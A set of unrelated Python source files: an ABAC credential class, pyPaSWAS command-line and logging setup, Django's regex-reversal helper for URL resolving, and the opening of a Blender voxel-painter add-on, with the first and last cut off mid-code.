self._principal_keyid = principal_keyid
self._principal_mnemonic = principal_mnemonic
self._role = role
self._linking_role = linking_role
def get_principal_keyid(self): return self._principal_keyid
def get_principal_mnemonic(self): return self._principal_mnemonic
def get_role(self): return self._role
def get_linking_role(self): return self._linking_role
def __str__(self):
ret = self._principal_keyid
if self._principal_mnemonic:
ret = "%s (%s)" % (self._principal_mnemonic, self._principal_keyid)
if self._linking_role:
ret += ".%s" % self._linking_role
if self._role:
ret += ".%s" % self._role
return ret
# Subclass of Credential for handling ABAC credentials
# They have a different cred_type (geni_abac vs. geni_sfa)
# and they have a head and tail and role (as opposed to privileges)
class ABACCredential(Credential):
ABAC_CREDENTIAL_TYPE = 'geni_abac'
def __init__(self, create=False, subject=None,
string=None, filename=None):
self.head = None # An ABACElemenet
self.tails = [] # List of ABACElements
super(ABACCredential, self).__init__(create=create,
subject=subject,
string=string,
filename=filename)
self.cred_type = ABACCredential.ABAC_CREDENTIAL_TYPE
def get_head(self) :
if not self.head:
self.decode()
return self.head
def get_tails(self) :
if len(self.tails) == 0:
self.decode()
return self.tails
def decode(self):
super(ABACCredential, self).decode()
# Pull out the ABAC-specific info
doc = parseString(self.xml)
rt0s = doc.getElementsByTagName('rt0')
if len(rt0s) != 1:
raise CredentialNotVerifiable("ABAC credential had no rt0 element")
rt0_root = rt0s[0]
heads = self._get_abac_elements(rt0_root, 'head')
if len(heads) != 1:
raise CredentialNotVerifiable("ABAC credential should have exactly 1 head element, had %d" % len(heads))
self.head = heads[0]
self.tails = self._get_abac_elements(rt0_root, 'tail')
def _get_abac_elements(self, root, label):
abac_elements = []
elements = root.getElementsByTagName(label)
for elt in elements:
keyids = elt.getElementsByTagName('keyid')
if len(keyids) != 1:
raise CredentialNotVerifiable("ABAC credential element '%s' should have exactly 1 keyid, had %d." % (label, len(keyids)))
keyid_elt = keyids[0]
keyid = keyid_elt.childNodes[0].nodeValue.strip()
mnemonic = None
mnemonic_elts = elt.getElementsByTagName('mnemonic')
if len(mnemonic_elts) > 0:
mnemonic = mnemonic_elts[0].childNodes[0].nodeValue.strip()
role = None
role_elts = elt.getElementsByTagName('role')
if len(role_elts) > 0:
role = role_elts[0].childNodes[0].nodeValue.strip()
linking_role = None
linking_role_elts = elt.getElementsByTagName('linking_role')
if len(linking_role_elts) > 0:
linking_role = linking_role_elts[0].childNodes[0].nodeValue.strip()
abac_element = ABACElement(keyid, mnemonic, role, linking_role)
abac_elements.append(abac_element)
return abac_elements
def dump_string(self, dump_parents=False, show_xml=False):
result = "ABAC Credential\n"
filename=self.get_filename()
if filename: result += "Filename %s\n"%filename
if self.expiration:
result += "\texpiration: %s \n" % self.expiration.strftime(SFATIME_FORMAT)
result += "\tHead: %s\n" % self.get_head()
for tail in self.get_tails():
result += "\tTail: %s\n" % tail
if self.get_signature():
result += " gidIssuer:\n"
result += self.get_signature().get_issuer_gid().dump_string(8, dump_parents)
if show_xml and HAVELXML:
try:
tree = etree.parse(StringIO(self.xml))
aside = etree.tostring(tree, pretty_print=True)
result += "\nXML:\n\n"
result += aside
result += "\nEnd XML\n"
except:
import traceback
print "exc. Credential.dump_string / XML"
traceback.print_exc()
return result
# sounds like this should be __repr__ instead ??
# Produce the ABAC assertion. Something like [ABAC cred: Me.role<-You] or similar
def pretty_cred(self):
result = "[ABAC cred: " + str(self.get_head())
for tail in self.get_tails():
result += "<-%s" % str(tail)
result += "]"
return result
def createABACElement(self, doc, tagName, abacObj):
kid = abacObj.get_principal_keyid()
mnem = abacObj.get_principal_mnemonic() # may be None
role = abacObj.get_role() # may be None
link = abacObj.get_linking_role() # may be None
ele = doc.createElement(tagName)
prin = doc.createElement('ABACprincipal')
ele.appendChild(prin)
append_sub(doc, prin, "keyid", kid)
if mnem:
append_sub(doc, prin, "mnemonic", mnem)
if role:
append_sub(doc, ele, "role", role)
if link:
append_sub(doc, ele, "linking_role", link)
return ele
##
# Encode the attributes of the credential into an XML string
# This should be done immediately before signing the credential.
# WARNING:
# In general, a signed credential obtained externally should
# not be changed else the signature is no longer valid. So, once
# you have loaded an existing signed credential, do not call encode() or sign() on it.
def encode(self):
# Create the XML document
doc = Document()
signed_cred = doc.createElement("signed-credential")
# Declare namespaces
# Note that credential/policy.xsd are really the PG schemas
# in a PL namespace.
# Note that delegation of credentials between the 2 only really works
# cause those schemas are identical.
# Also note these PG schemas talk about PG tickets and CM policies.
signed_cred.setAttribute("xmlns:xsi", "http://www.w3.org/2001/XMLSchema-instance")
signed_cred.setAttribute("xsi:noNamespaceSchemaLocation", "http://www.geni.net/resources/credential/2/credential.xsd")
signed_cred.setAttribute("xsi:schemaLocation", "http://www.planet-lab.org/resources/sfa/ext/policy/1 http://www.planet-lab.org/resources/sfa/ext/policy/1/policy.xsd")
# PG says for those last 2:
# signed_cred.setAttribute("xsi:noNamespaceSchemaLocation", "http://www.protogeni.net/resources/credential/credential.xsd")
# signed_cred.setAttribute("xsi:schemaLocation", "http://www.protogeni.net/resources/credential/ext/policy/1 http://www.protogeni.net/resources/credential/ext/policy/1/policy.xsd")
doc.appendChild(signed_cred)
# Fill in the <credential> bit
cred = doc.createElement("credential")
cred.setAttribute("xml:id", self.get_refid())
signed_cred.appendChild(cred)
append_sub(doc, cred, "type", "abac")
# Stub fields
append_sub(doc, cred, "serial", "8")
append_sub(doc, cred, "owner_gid", '')
append_sub(doc, cred, "owner_urn", '')
append_sub(doc, cred, "target_gid", '')
append_sub(doc, cred, "target_urn", '')
append_sub(doc, cred, "uuid", "")
if not self.expiration:
self.set_expiration(datetime.datetime.utcnow() + datetime.timedelta(seconds=DEFAULT_CREDENTIAL_LIFETIME))
self.expiration = self.expiration.replace(microsecond=0)
if self.expiration.tzinfo is not None and self.expiration.tzinfo.utcoffset(self.expiration) is not None:
# TZ aware. Make sure it is UTC
self.expiration = self.expiration.astimezone(tz.tzutc())
append_sub(doc, cred, "expires", self.expiration.strftime(SFATIME_FORMAT)) # RFC3339
abac = doc.createElement("abac")
rt0 = doc.createElement("rt0")
abac.appendChild(rt0)
cred.appendChild(abac)
append_sub(doc, rt0, "version", "1.1")
head = self.createABACElement(doc, "head", self.get_head())
rt0.appendChild(head)
for tail in self.get_tails():
tailEle = self.createABACElement(doc, "tail", tail)
rt0.appendChild(tailEle)
# Create the <signatures> tag
signatures = doc.createElement("signatures")
signed_cred.appendChild(signatures)
# Get the finished product
self.xml = doc.toxml("utf-8")
|
|
'''
TODO Add a proper introduction of the package.
'''
from pyPaSWAS.Core.Exceptions import InvalidOptionException
from datetime import datetime
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import logging
import optparse
import os
import sys
def set_logger(settings):
'''
This functions creates a logger object that always logs to the command
line or optionally to a log file. Refer to the documentation of the
standard logging module for more information. The logger object is
stored in self.logger.
the following values should be present in self.settings:
string self.settings.logfile: the file to which messages are logged. If
logging to a file is not required, this value should be None.
int self.settings.loglevel: the threshold level for logging.
See the built-in logging module for details.
'''
# Check log level for validity
numeric_level = getattr(logging, settings.loglevel.upper())
if not isinstance(numeric_level, int):
raise InvalidOptionException('Invalid log level: %s' % settings.loglevel)
# Root logger, stdout handler will be removed
logger = logging.getLogger()
lh_stdout = logger.handlers[0]
logger.setLevel(numeric_level)
# Configure logging to console
if settings.logfile is None:
# Only import when printing to terminal otherwise the ASCI escapes end up in a (log) file
from pyPaSWAS.Core.cfg import Colorer
console_format = logging.Formatter('%(levelname)s - %(message)s')
console_format.propagate = False
console_handler = logging.StreamHandler()
console_handler.setLevel(numeric_level)
console_handler.setFormatter(console_format)
logger.addHandler(console_handler)
elif settings.logfile is not None:
# Check log file for validity. For uniformity a ValueError may be raised
try:
logfile = open(settings.logfile, 'a')
_log_settings_to_file(logfile, settings)
logfile.close()
except(IOError):
raise InvalidOptionException('Invalid log file or writing forbidden: %s' % settings.logfile)
file_format = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
file_format.propagate = False
file_handler = logging.FileHandler(settings.logfile)
file_handler.setLevel(numeric_level)
file_handler.setFormatter(file_format)
logger.addHandler(file_handler)
# Disable root logger (stdout)
logger.removeHandler(lh_stdout)
return logger
def parse_cli(config_file):
'''
parseCLI()
This function parses the command line using the optparse module from the python standard library.
Though deprecated since python 2.7, optparse still is used in stead of argparse because the python
version available at the development systems was 2.6.
The options and arguments are stored in the global variables settings and arguments, respectively.
'''
# Read defaults
config = ConfigParser.ConfigParser()
try:
config.read(config_file)
except ConfigParser.ParsingError:
raise ConfigParser.ParsingError("Unable to parse the defaults file ({})".format(config_file))
parser = optparse.OptionParser()
parser.description = ('This program performs a Smith-Waterman alignment of all sequences in FILE_1'
' against all sequences in FILE_2.\nBoth files should be in the fasta format.')
usage = '%prog [options] FILE_1 FILE_2'
parser.usage = usage
# general options
# TODO: Get final naming (convention) for all parameters!!
general_options = optparse.OptionGroup(parser, 'Options that affect the general operation of the program')
general_options.add_option('-L', '--logfile', help='log events to FILE', metavar="FILE", dest='logfile')
general_options.add_option('--loglevel', help='log level. Valid options are DEBUG, INFO, WARNING, ERROR'
' and CRITICAL', dest='loglevel', default=config.get('General', 'loglevel'))
general_options.add_option('-o', '--out', help='The file in which the program stores the generated output.'
'\nDefaults to ./output', dest='out_file', default=config.get('General', 'out_file'))
general_options.add_option('--outputformat', help='The format of the file in which the program stores the '
'generated output.\nAvailable options are TXT and SAM.\nDefaults to txt',
dest='out_format', default=config.get('General', 'out_format'))
general_options.add_option('-p', '--program', help='The program to be executed. Valid options are "aligner"'
' and "trimmer"', dest='program',
default=config.get('General', 'program'))
general_options.add_option('-1', '--filetype1', help='File type of the first file. See bioPython IO for'
' available options', dest='filetype1', default=config.get('General', 'filetype1'))
general_options.add_option('-2', '--filetype2', help='File type of the second file. See bioPython IO for'
' available options', dest='filetype2', default=config.get('General', 'filetype2'))
general_options.add_option('-O', '--override_output', help='When output file exists, override it (T/F)',
dest='override_output', default=config.get('General', 'override_output'))
general_options.add_option('-c', '--configfile', help='Give settings using configuration file',
dest='config_file', default=False)
parser.add_option_group(general_options)
input_options = optparse.OptionGroup(parser, 'start & stop indices for processing files. Handy for cluster processing. Leave all to zero to process all.')
input_options.add_option('--start_query', help='start index in the query file (1)', dest='start_query', default=config.get("Input", "start_query"))
input_options.add_option('--end_query', help='end index in the query file (1)', dest='end_query', default=config.get("Input", "end_query"))
input_options.add_option('--start_target', help='start index in the target file (2)', dest='start_target', default=config.get("Input", "start_target"))
input_options.add_option('--end_target', help='end index in the target file (2)', dest='end_target', default=config.get("Input", "end_target"))
input_options.add_option('--sequence_step', help='Number of sequences read from file 2 before processing. Handy when processing NGS files.',
dest='sequence_step', default=config.get('Input', 'sequence_step'))
input_options.add_option('--query_step', help='Number of sequences read from file 1 before processing. Handy when processing NGS files.',
dest='query_step', default=config.get('Input', 'query_step'))
parser.add_option_group(input_options)
aligner_options = optparse.OptionGroup(parser, 'Options that affect the alignment.\nAligners include aligner'
' and mapper')
aligner_options.add_option('--customMatrix', help='the custom matrix that should be used', dest='custom_matrix')
aligner_options.add_option('-G', '--gap_score', help='Float. Penalty for a gap', dest='gap_score',
default=config.get('Aligner', 'gap_score'))
aligner_options.add_option('-g', '--gap_extension', help='Float. Penalty for a gap extension. Set to zero to ignore this (faster)', dest='gap_extension',
default=config.get('Aligner', 'gap_extension'))
aligner_options.add_option('-M', '--matrixname', help='The scoring to be used. Valid options are '
'"DNA-RNA", "BASIC", "Blosum62", "Blosum80" and "CUSTOM"', dest='matrix_name',
default=config.get('Aligner', 'matrix_name'))
aligner_options.add_option('-q', '--mismatch_score', help='Float. Penalty for mismatch', dest='mismatch_score',
default=config.get('Aligner', 'mismatch_score'))
aligner_options.add_option('-r', '--match_score', help='Float. Reward for match', dest='match_score',
default=config.get('Aligner', 'match_score'))
aligner_options.add_option('--any', help='Float. Score for a character which is neither in the nucleotide'
' list ("ACGTU"), nor equal to the anyNucleotide character ("N").\nOnly relevant'
' for use with the DNA-RNA scoring type.', dest='any_score',
default=config.get('Aligner', 'any_score'))
aligner_options.add_option('--other', help='Float. Score if the anyNucleotide character ("N") is present in'
' either query or subject.\nOnly relevant for use with the DNA-RNA scoring type.',
dest='other_score', default=config.get('Aligner', 'other_score'))
aligner_options.add_option('--minimum', help='Float. Sets the minimal score that initiates a back trace.'
' Do not set this very low: output may be flooded by hits.', dest='minimum_score',
default=config.get('Aligner', 'minimum_score'))
aligner_options.add_option('--llimit', help='Float. Sets the lower limit for the maximum score '
'which will be used to report a hit. pyPaSWAS will then also report hits with '
'a score lowerLimitScore * highest hit score. Set to <= 1.0. ',
dest='lower_limit_score', default=config.get('Aligner', 'lower_limit_score'))
parser.add_option_group(aligner_options)
filter_options = optparse.OptionGroup(parser, 'Options for filtering the output' )
filter_options.add_option('--filter_factor', help='The filter factor to be used. Reports only hits within'
' filterFactor * highest possible score * length shortest sequence (or: defines'
' lowest value of the reported relative score). Set to <= 1.0',
dest='filter_factor', default=config.get('Filter', 'filter_factor'))
filter_options.add_option('--query_coverage', help='Minimum query coverage. Set to <= 1.0',
dest='query_coverage', default=config.get('Filter', 'query_coverage'))
filter_options.add_option('--query_identity', help='Minimum query identity. Set to <= 1.0',
dest='query_identity', default=config.get('Filter', 'query_identity'))
filter_options.add_option('--relative_score', help='Minimum relative score, defined by the alignment score'
' divided by the length of the shortest of the two sequences. Set to <= highest possible score'
', for example 5.0 in case of DNA',
dest='relative_score', default=config.get('Filter', 'relative_score'))
filter_options.add_option('--base_score', help='Minimum base score, defined by the alignment score'
' divided by the length of the alignment (including gaps). Set to <= highest possible score'
', for example 5.0 in case of DNA',
dest='base_score', default=config.get('Filter', 'base_score'))
parser.add_option_group(filter_options)
graph_options = optparse.OptionGroup(parser, 'Options to connect to a neo4j graph database and store mappings in a graph')
graph_options.add_option('--hostname',help='Neo4j database host', default=config.get("GraphDatabase", "hostname"), dest="hostname")
graph_options.add_option('--username',help='Neo4j user name', default=config.get("GraphDatabase", "username"), dest="username")
graph_options.add_option('--password',help='Neo4j password', default=config.get("GraphDatabase", "password"), dest="password")
graph_options.add_option('--target_node',help='Target node name', default=config.get("GraphDatabase", "target_node"), dest="target_node")
graph_options.add_option('--sequence_node',help='Sequence node name', default=config.get("GraphDatabase", "sequence_node"), dest="sequence_node")
parser.add_option_group(graph_options)
device_options = optparse.OptionGroup(parser, 'Options that affect the usage and settings of the '
'parallel devices')
device_options.add_option('--device', help='the device on which the computations will be performed. '
'This should be an integer.', dest='device_number',
default=config.get('Device', 'device_number'))
device_options.add_option('--number_of_compute_units', help='Number of compute units to use (openCL only). Will not work on every device, recommended for CPU only. Set this 1 to use a single core on the device for example.'
'This should be an integer, using 0 for full device.', dest='number_of_compute_units',
default=config.get('Device', 'number_of_compute_units'))
device_options.add_option('--sub_device', help='the sub device on which the computations will be performed. Only used when number_of_compute_units > 0. '
'This should be an integer.', dest='sub_device',
default=config.get('Device', 'sub_device'))
device_options.add_option('--limit_length', help='Length of the longest sequence in characters to be read'
' from file. Lower this when memory of GPU is low.', dest='limit_length',
default=config.get('Device', 'limit_length'))
device_options.add_option('--maximum_memory_usage', help='Fraction (<= 1.0) of available device memory to use. Useful when several pyPaSWAS applications are running.', dest="maximum_memory_usage", default=config.get('Device', 'maximum_memory_usage'))
device_options.add_option('--njobs', help='Sets the number of jobs run simultaneously on the grid. Will read'
' only part of the sequence file. (not implemented yet)', dest='number_of_jobs')
device_options.add_option('--process_id', help='Sets the processID of this job in the grid. ',
dest='process_id')
device_options.add_option('--max_genome_length', help='Deprecated.\nDefaults to 200000',
dest='max_genome_length', default=config.get('Device', 'max_genome_length'))
device_options.add_option('--recompile', help='Recompile CUDA code? Set to F(alse) when sequences are of similar length: much faster.',
dest='recompile', default=config.get('Device', 'recompile'))
device_options.add_option('--short_sequences', help='Set to T(true) when aligning short sequences (trimming?) to maximize memory usage.',
dest='short_sequences', default=config.get('Device', 'short_sequences'))
parser.add_option_group(device_options)
framework_options = optparse.OptionGroup(parser, 'Determines which parallel computing framework to use for this program ')
framework_options.add_option('--framework', help='Choose which parallel computing framework to use, can be either CUDA or OpenCL ', dest='framework',default=config.get('Framework','language'))
parser.add_option_group(framework_options)
ocl_options = optparse.OptionGroup(parser, 'Options for the usage of the OpenCL framework ')
ocl_options.add_option('--device_type', help='Type of device to perform computations on (either CPU, GPU or ACCELARATOR)',
dest='device_type', default=config.get('OpenCL', 'device_type'))
ocl_options.add_option('--platform_name', help='Platform to run computations on (either Intel, NVIDIA or AMD)',
dest='platform_name', default=config.get('OpenCL', 'platform_name'))
parser.add_option_group(ocl_options)
(settings, arguments) = parser.parse_args()
# If an extra configuration file is given, override settings as given by this file
if settings.config_file:
(settings, arguments) = _override_settings(settings.config_file, settings, arguments)
if len(arguments) < 2:
raise InvalidOptionException('Missing input files')
return (settings, arguments)
def _override_settings(config_file, settings, arguments):
''' Parse optional config file and change arguments accordingly '''
config = ConfigParser.ConfigParser()
try:
config.read(config_file)
except ConfigParser.ParsingError:
raise ConfigParser.ParsingError("Unable to parse the given configuration file ({})".format(config_file))
# Replace input files with those given in the config file
#if config.get('General', 'FILE1') != '' and config.get('General', 'FILE2') != '':
# arguments = [config.get('General', 'FILE1'), config.get('General', 'FILE2')]
# config.remove_option('General', 'FILE1')
# config.remove_option('General', 'FILE2')
# Replace all other settings set in the config file
sections = config.sections()
for section in sections:
section_settings = [name for name, setting in config.items(section)]
for setting in section_settings:
if config.get(section, setting):
settings._update_careful({setting: config.get(section, setting)})
return (settings, arguments)
def _log_settings_to_file(logfile_handle, settings):
''' Prints all settings in effect using the given log file handle '''
# Print analysis start time
today = datetime.today()
logfile_handle.write("\n{}\n".format('-' * 74))
logfile_handle.write(today.strftime("pyPaSWAS run started at: %Y-%m-%d %H:%M:%S"
" using the following settings:\n"))
logfile_handle.write("{}\n".format('-' * 74))
# Iterate all settings and write to log file
for setting, value in vars(settings).items():
if value == None:
value = 'N/A'
setting_table = "{0:30}".format(setting), ':', "{0:>30}\n".format(value)
logfile_handle.write(''.join(setting_table))
logfile_handle.write("{}\n".format('-' * 74))
def normalize_file_path(path):
'''creates an absolute path from a relative path'''
if not os.path.isabs(path):
curdir = os.getcwd()
path = os.path.join(curdir, path)
path = os.path.normpath(path)
return path
|
|
"""
Functions for reversing a regular expression (used in reverse URL resolving).
Used internally by Django and not intended for external use.
This is not, and is not intended to be, a complete reg-exp decompiler. It
should be good enough for a large class of URLS, however.
"""
from __future__ import unicode_literals
from django.utils import six
from django.utils.six.moves import zip
# Mapping of an escape character to a representative of that class. So, e.g.,
# "\w" is replaced by "x" in a reverse URL. A value of None means to ignore
# this sequence. Any missing key is mapped to itself.
ESCAPE_MAPPINGS = {
"A": None,
"b": None,
"B": None,
"d": "0",
"D": "x",
"s": " ",
"S": "x",
"w": "x",
"W": "!",
"Z": None,
}
class Choice(list):
"""
Used to represent multiple possibilities at this point in a pattern string.
We use a distinguished type, rather than a list, so that the usage in the
code is clear.
"""
class Group(list):
"""
Used to represent a capturing group in the pattern string.
"""
class NonCapture(list):
"""
Used to represent a non-capturing group in the pattern string.
"""
def normalize(pattern):
"""
Given a reg-exp pattern, normalizes it to an iterable of forms that
suffice for reverse matching. This does the following:
(1) For any repeating sections, keeps the minimum number of occurrences
permitted (this means zero for optional groups).
(2) If an optional group includes parameters, include one occurrence of
that group (along with the zero occurrence case from step (1)).
(3) Select the first (essentially an arbitrary) element from any character
class. Select an arbitrary character for any unordered class (e.g. '.'
or '\w') in the pattern.
(5) Ignore comments and any of the reg-exp flags that won't change
what we construct ("iLmsu"). "(?x)" is an error, however.
(6) Raise an error on all other non-capturing (?...) forms (e.g.
look-ahead and look-behind matches) and any disjunctive ('|')
constructs.
Django's URLs for forward resolving are either all positional arguments or
all keyword arguments. That is assumed here, as well. Although reverse
resolving can be done using positional args when keyword args are
specified, the two cannot be mixed in the same reverse() call.
"""
# Do a linear scan to work out the special features of this pattern. The
# idea is that we scan once here and collect all the information we need to
# make future decisions.
result = []
non_capturing_groups = []
consume_next = True
pattern_iter = next_char(iter(pattern))
num_args = 0
# A "while" loop is used here because later on we need to be able to peek
# at the next character and possibly go around without consuming another
# one at the top of the loop.
try:
ch, escaped = next(pattern_iter)
except StopIteration:
return [('', [])]
try:
while True:
if escaped:
result.append(ch)
elif ch == '.':
# Replace "any character" with an arbitrary representative.
result.append(".")
elif ch == '|':
# FIXME: One day we'll should do this, but not in 1.0.
raise NotImplementedError('Awaiting Implementation')
elif ch == "^":
pass
elif ch == '$':
break
elif ch == ')':
# This can only be the end of a non-capturing group, since all
# other unescaped parentheses are handled by the grouping
# section later (and the full group is handled there).
#
# We regroup everything inside the capturing group so that it
# can be quantified, if necessary.
start = non_capturing_groups.pop()
inner = NonCapture(result[start:])
result = result[:start] + [inner]
elif ch == '[':
# Replace ranges with the first character in the range.
ch, escaped = next(pattern_iter)
result.append(ch)
ch, escaped = next(pattern_iter)
while escaped or ch != ']':
ch, escaped = next(pattern_iter)
elif ch == '(':
# Some kind of group.
ch, escaped = next(pattern_iter)
if ch != '?' or escaped:
# A positional group
name = "_%d" % num_args
num_args += 1
result.append(Group((("%%(%s)s" % name), name)))
walk_to_end(ch, pattern_iter)
else:
ch, escaped = next(pattern_iter)
if ch in "iLmsu#":
# All of these are ignorable. Walk to the end of the
# group.
walk_to_end(ch, pattern_iter)
elif ch == ':':
# Non-capturing group
non_capturing_groups.append(len(result))
elif ch != 'P':
# Anything else, other than a named group, is something
# we cannot reverse.
raise ValueError("Non-reversible reg-exp portion: '(?%s'" % ch)
else:
ch, escaped = next(pattern_iter)
if ch not in ('<', '='):
raise ValueError("Non-reversible reg-exp portion: '(?P%s'" % ch)
# We are in a named capturing group. Extra the name and
# then skip to the end.
if ch == '<':
terminal_char = '>'
# We are in a named backreference.
else:
terminal_char = ')'
name = []
ch, escaped = next(pattern_iter)
while ch != terminal_char:
name.append(ch)
ch, escaped = next(pattern_iter)
param = ''.join(name)
# Named backreferences have already consumed the
# parenthesis.
if terminal_char != ')':
result.append(Group((("%%(%s)s" % param), param)))
walk_to_end(ch, pattern_iter)
else:
result.append(Group((("%%(%s)s" % param), None)))
elif ch in "*?+{":
# Quanitifers affect the previous item in the result list.
count, ch = get_quantifier(ch, pattern_iter)
if ch:
# We had to look ahead, but it wasn't need to compute the
# quanitifer, so use this character next time around the
# main loop.
consume_next = False
if count == 0:
if contains(result[-1], Group):
# If we are quantifying a capturing group (or
# something containing such a group) and the minimum is
# zero, we must also handle the case of one occurrence
# being present. All the quantifiers (except {0,0},
# which we conveniently ignore) that have a 0 minimum
# also allow a single occurrence.
result[-1] = Choice([None, result[-1]])
else:
result.pop()
elif count > 1:
result.extend([result[-1]] * (count - 1))
else:
# Anything else is a literal.
result.append(ch)
if consume_next:
ch, escaped = next(pattern_iter)
else:
consume_next = True
except StopIteration:
pass
except NotImplementedError:
# A case of using the disjunctive form. No results for you!
return [('', [])]
return list(zip(*flatten_result(result)))
def next_char(input_iter):
"""
An iterator that yields the next character from "pattern_iter", respecting
escape sequences. An escaped character is replaced by a representative of
its class (e.g. \w -> "x"). If the escaped character is one that is
skipped, it is not returned (the next character is returned instead).
Yields the next character, along with a boolean indicating whether it is a
raw (unescaped) character or not.
"""
for ch in input_iter:
if ch != '\\':
yield ch, False
continue
ch = next(input_iter)
representative = ESCAPE_MAPPINGS.get(ch, ch)
if representative is None:
continue
yield representative, True
def walk_to_end(ch, input_iter):
"""
The iterator is currently inside a capturing group. We want to walk to the
close of this group, skipping over any nested groups and handling escaped
parentheses correctly.
"""
if ch == '(':
nesting = 1
else:
nesting = 0
for ch, escaped in input_iter:
if escaped:
continue
elif ch == '(':
nesting += 1
elif ch == ')':
if not nesting:
return
nesting -= 1
def get_quantifier(ch, input_iter):
"""
Parse a quantifier from the input, where "ch" is the first character in the
quantifier.
Returns the minimum number of occurences permitted by the quantifier and
either None or the next character from the input_iter if the next character
is not part of the quantifier.
"""
if ch in '*?+':
try:
ch2, escaped = next(input_iter)
except StopIteration:
ch2 = None
if ch2 == '?':
ch2 = None
if ch == '+':
return 1, ch2
return 0, ch2
quant = []
while ch != '}':
ch, escaped = next(input_iter)
quant.append(ch)
quant = quant[:-1]
values = ''.join(quant).split(',')
# Consume the trailing '?', if necessary.
try:
ch, escaped = next(input_iter)
except StopIteration:
ch = None
if ch == '?':
ch = None
return int(values[0]), ch
def contains(source, inst):
"""
Returns True if the "source" contains an instance of "inst". False,
otherwise.
"""
if isinstance(source, inst):
return True
if isinstance(source, NonCapture):
for elt in source:
if contains(elt, inst):
return True
return False
def flatten_result(source):
"""
Turns the given source sequence into a list of reg-exp possibilities and
their arguments. Returns a list of strings and a list of argument lists.
Each of the two lists will be of the same length.
"""
if source is None:
return [''], [[]]
if isinstance(source, Group):
if source[1] is None:
params = []
else:
params = [source[1]]
return [source[0]], [params]
result = ['']
result_args = [[]]
pos = last = 0
for pos, elt in enumerate(source):
if isinstance(elt, six.string_types):
continue
piece = ''.join(source[last:pos])
if isinstance(elt, Group):
piece += elt[0]
param = elt[1]
else:
param = None
last = pos + 1
for i in range(len(result)):
result[i] += piece
if param:
result_args[i].append(param)
if isinstance(elt, (Choice, NonCapture)):
if isinstance(elt, NonCapture):
elt = [elt]
inner_result, inner_args = [], []
for item in elt:
res, args = flatten_result(item)
inner_result.extend(res)
inner_args.extend(args)
new_result = []
new_args = []
for item, args in zip(result, result_args):
for i_item, i_args in zip(inner_result, inner_args):
new_result.append(item + i_item)
new_args.append(args[:] + i_args)
result = new_result
result_args = new_args
if pos >= last:
piece = ''.join(source[last:])
for i in range(len(result)):
result[i] += piece
return result, result_args
|
|
"""
addon-voxel-painter.py
Copyright (c) 2013 Luke Frisken
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import bpy
from bpy.props import StringProperty, BoolProperty, IntProperty, FloatProperty, \
FloatVectorProperty, EnumProperty, PointerProperty
from bpy.types import Operator
from mathutils import Vector
from bpy_extras import view3d_utils
#Miscelaneous Functions and classes
def operator_contextswitch(context, obj, operator, **argsdic):
ctx = context.copy()
ctx["active_object"] = obj
ctx["selected_bases"] = [obj]
#ctx["edit_object"] = None
ctx["object"] = obj
operator(ctx, **argsdic)
del ctx
def selection_context(obj):
override = {'selected_bases':[obj],
'object':obj,
'active_object':obj}
return override
def get_active(context):
return context.scene.objects.active
def set_active(context, obj):
#if(obj is None):
#print("active:None")
context.scene.objects.active = obj
def select_none(context, active=False):
bpy.ops.object.select_all(action='DESELECT')
if(not active):
set_active(context, None)
class SelectionBackup(object):
"""This class is used for creating a backup of the context
in the current scene. active_only flag is used to tell it
to only pay attention to the active object, and not touch
the rest of the selection stuff"""
def __init__(self, context, active_only=False, append=False):
self.append = append
self.active_only = active_only
self.context = context
self.active = get_active(self.context)
if not self.active_only:
self.bases = self.context.selected_bases.copy()
def restore(self):
if self.active_only:
set_active(self.context, self.active)
return
if not self.append:
select_none(self.context)
for b in self.bases:
#check that the object still exists
if(b in self.context.selectable_bases):
try:
b.select = True
except:
pass
#print("restoring active")
set_active(self.context, self.active)
#print("done restoring active")
#Voxel Editor base classes
class VoxelRayIntersection(object):
def __init__(self, voxel, loc, nor, dist_squared):
self.voxel = voxel
self.dist_squared = dist_squared
self.loc = loc
self.nor = nor
def __str__(self):
return "VRI Vox:{0}, Dist:{1}".format(
self.voxel.obj.name,
self.dist_squared)
class BlenderObject(object):
def __init__(self, obj, context):
self.obj = obj
self.context = context
def select(self, active=True):
"""Select the voxel in the blender viewport"""
self.obj.select = True
if active:
set_active(self.context, self.obj)
def deselect(self, active=False):
"""Deselect the voxel in the blender viewport"""
self.obj.select = False
if(get_active(self.context) == self.obj):
set_active(self.context, None)
def delete(self):
select_none(self.context)
self.select()
bpy.ops.object.delete()
def get_local_location(self):
return self.obj.location
class BlenderObjectMesh(BlenderObject):
def __init__(self, obj, context, creating=False):
super(BlenderObjectMesh, self).__init__(obj, context)
if creating == True:
self.copy_obj_mesh_name()
def copy_obj_mesh_name(self):
self.obj.data.name = self.obj.name
class IntersectionMesh(BlenderObjectMesh):
pass
class Voxel(BlenderObjectMesh):
#Operator Poll Functions
@classmethod
def poll_voxel_mesh(cls, obj):
if(obj.type != 'MESH'):
return False
if(obj.parent is not None):
if(VoxelArray.poll_voxelarray_empty_created(obj.parent)):
return True
return False
def copy_props(self, dic):
"""copy voxel properties to an external dictionary dic"""
@classmethod
def gen_get_name(cls, vec):
"""Get the string for the object name using position vector"""
return "Voxel" + "({0}, {1}, {2})".format(vec[0], vec[1], vec[2])
def gen_set_name(self, vec):
"""Set voxel object name"""
self.obj.name = self.gen_get_name(vec)
self.copy_obj_mesh_name()
def set_draw_type(self, draw_type):
#print("setting " + str(self.obj) + "to drawtype: " + str(draw_type))
self.obj.draw_type = draw_type
def delete(self):
isect_mesh = self.get_isect_mesh()
if isect_mesh is not None:
isect_mesh.delete()
